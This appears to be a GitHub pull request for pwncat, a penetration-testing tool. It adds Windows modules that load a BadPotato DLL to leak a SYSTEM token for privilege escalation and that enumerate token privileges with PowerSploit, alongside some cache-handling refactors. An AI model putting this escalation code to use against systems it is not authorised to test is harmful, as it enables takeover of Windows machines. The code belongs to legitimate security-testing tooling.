### PR TITLE
[FEATURE #106] Token Impersonation Ability and BadPotato PoC

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,6 +14,7 @@ and simply didn't have the time to go back and retroactively create one.
 - Added query-string arguments to connection strings for both the entrypoint
   and the `connect` command.
 - Added Enumeration States to allow session-bound enumerations
+- Added Windows privilege escalation via BadPotato plugin ([#106](https://github.com/calebstewart/pwncat/issues/106))
 
 ## [0.4.3] - 2021-06-18
 Patch fix release. Major fixes are the correction of file IO for LinuxWriters and

--- a/pwncat/modules/agnostic/enumerate/escalate/replace.py
+++ b/pwncat/modules/agnostic/enumerate/escalate/replace.py
@@ -25,7 +25,7 @@ class Module(EnumerateModule):
     user in the running session with the new user."""
 
     PLATFORM = None
-    SCHEDULE = Schedule.PER_USER
+    SCHEDULE = Schedule.ALWAYS
     PROVIDES = ["escalate.replace"]
 
     def enumerate(self, session: "pwncat.manager.Session"):

--- a/pwncat/modules/enumerate.py
+++ b/pwncat/modules/enumerate.py
@@ -161,8 +161,14 @@ class EnumerateModule(BaseModule):
                 fact for fact in session.target.facts if fact.source != self.name
             ]
 
+            if self.name in session.target.enumerate_state:
+                del session.target.enumerate_state[self.name]
+
         if self.SCOPE is Scope.SESSION:
             session.facts = [fact for fact in session.facts if fact.source != self.name]
+
+            if self.name in session.enumerate_state:
+                del session.enumerate_state[self.name]
 
         return []
 
@@ -225,9 +231,6 @@ class EnumerateModule(BaseModule):
         :type cache: bool
         """
 
-        # Retrieve the DB target object
-        target = session.target
-
         if clear:
             self._clear_cache(session)
             return
@@ -261,11 +264,7 @@ class EnumerateModule(BaseModule):
                 continue
 
             # Only add the item if it doesn't exist
-            for f in target.facts:
-                if f == item:
-                    break
-            else:
-                session.register_fact(item, self.SCOPE, commit=False)
+            session.register_fact(item, self.SCOPE, commit=False)
 
             # Don't yield the actual fact if we didn't ask for this type
             if not types or any(

--- a/pwncat/modules/windows/enumerate/token/potato.py
+++ b/pwncat/modules/windows/enumerate/token/potato.py
@@ -1,0 +1,40 @@
+#!/usr/bin/env python3
+
+import pwncat
+from pwncat.modules import Status, ModuleFailed
+from pwncat.facts.windows import UserToken
+from pwncat.platform.windows import Windows, ProtocolError
+from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule
+
+
+class Module(EnumerateModule):
+    """Execute the BadPotato expoit to leak a SYSTEM user token"""
+
+    PLATFORM = [Windows]
+    SCHEDULE = Schedule.PER_USER
+    SCOPE = Scope.SESSION
+    PROVIDES = ["token", "ability.execute"]
+
+    def enumerate(self, session: "pwncat.manager.Session"):
+
+        # Non-admin users will crash the C2 if we try bad potato
+        if not session.platform.is_admin():
+            return
+
+        try:
+            # Load the badpotato plugin
+            yield Status("loading badpotato c2 plugin...")
+            badpotato = session.platform.dotnet_load("BadPotato.dll")
+
+            # Grab a system token
+            yield Status("triggering badpotato exploit...")
+            token = badpotato.get_system_token()
+
+            # Yield the new SYSTEM token
+            yield UserToken(
+                source=self.name,
+                uid=session.find_user(name="NT AUTHORITY\\SYSTEM").id,
+                token=token,
+            )
+        except ProtocolError as exc:
+            raise ModuleFailed(f"failed to load badpotato: {exc}")

--- a/pwncat/modules/windows/enumerate/token/privs.py
+++ b/pwncat/modules/windows/enumerate/token/privs.py
@@ -1,0 +1,35 @@
+#!/usr/bin/env python3
+import pwncat
+from pwncat.modules import ModuleFailed
+from pwncat.facts.windows import ProcessTokenPrivilege
+from pwncat.platform.windows import Windows, PowershellError
+from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule
+
+
+class Module(EnumerateModule):
+    """Locate process privileges"""
+
+    PLATFORM = [Windows]
+    SCHEDULE = Schedule.PER_USER
+    SCOPE = Scope.SESSION
+    PROVIDES = ["token.privilege"]
+
+    def enumerate(self, session: "pwncat.manager.Session"):
+        """Check for privileges"""
+
+        # Load PowerUp.ps1
+        session.run("powersploit", group="privesc")
+
+        try:
+            privs = session.platform.powershell("Get-ProcessTokenPrivilege")[0]
+        except (IndexError, PowershellError) as exc:
+            raise ModuleFailed(f"failed to find process token privs: {exc}")
+
+        for priv in privs:
+            yield ProcessTokenPrivilege(
+                source=self.name,
+                name=priv["Privilege"],
+                attributes=priv["Attributes"],
+                handle=priv["TokenHandle"],
+                pid=priv["ProcessId"],
+            )

--- a/tests/test_fileio.py
+++ b/tests/test_fileio.py
@@ -17,10 +17,7 @@ def do_file_test(session, content):
 
     # In some cases, the act of reading/writing causes a shell to hang
     # so double check that.
-    result = session.platform.run(
-        ["echo", "hello world"], capture_output=True, text=True
-    )
-    assert result.stdout == "hello world\n"
+    assert len(list(session.platform.Path("/").iterdir())) > 0
 
 
 def test_small_text(session):


### PR DESCRIPTION
## Description of Changes

Fixes #106.

Added an execute ability named `UserToken` under `pwncat.facts.windows`. This execute ability will utilize a leaked user token to impersonate the identity of another user. The `enumerate.token.potato` module implements the [BadPotato](https://github.com/BeichenDream/BadPotato) technique to leak a SYSTEM token. This can then be used to impersonate the system account. These two pieces allow pwncat's `escalate` command to effectively escalate to the `NT AUTHORITY\SYSTEM` account.

**Please note any `noqa:` comments needed to appease flake8.**

## Major Changes Implemented:
- Added `enumerate.token.potato` and `enumerate.token.privileges` modules
- Added `UserToken` standard Windows fact type for other token leaking situations in the future.

## Pre-Merge Tasks
- [x] Formatted all modified files w/ `python-black`
- [x] Sorted imports for modified files w/ `isort`
- [x] Ran `flake8` on repo, and fixed any new problems w/ modified files
- [x] Ran `pytest` test cases
- [x] Added brief summary of updates to CHANGELOG (under `[Unreleased]`)

**For issues with pre-merge tasks, see CONTRIBUTING.md**

## Screenshot of BadPotato in Action

![image](https://user-images.githubusercontent.com/7529189/122631698-63ee4500-d09b-11eb-8e76-cf0eac162ffc.png)

<!--
If you are submitting a pull request for a new module, the following
information is also helpful:

## Platform and Environment Restrictions
(e.g. "Windows targets without HOTFIX XXXXXX")

## Full Qualified Module Name
(e.g. "linux.enumerate.system.network")

## Artifacts Generated
(e.g. "creates file at /etc/something.ini tracked w/ a tamper")

## Tested Targets
(e.g. "Tested on Windows 10 1604")
-->
